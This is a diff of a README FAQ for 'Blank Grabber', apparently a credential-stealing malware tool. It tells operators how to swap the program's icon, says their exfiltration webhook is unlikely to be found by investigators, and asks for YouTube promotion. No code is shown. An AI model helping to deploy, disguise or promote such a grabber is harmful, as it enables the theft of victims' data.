Blank-c/Blank-Grabber/README.md

 > *You can replace the "icon.ico" file in the "Data" folder with your icon but name and format (.ico) must be the same.*

 **3) Can my webhook get leaked?**
-> *If the "virus hunter" is not familiar with Blank Grabber, there is a very less chance that your webhook is going to be found.*
+> *There is a very less chance that your webhook is going to be found.*

 **4) How can I support the development?**
 > *You can star the repository and make YouTube videos about this grabber (you must include the link to the [original repository](https://github.com/Blank-c/Blank-Grabber)).
 But you are not allowed to frame this grabber as your own creation.*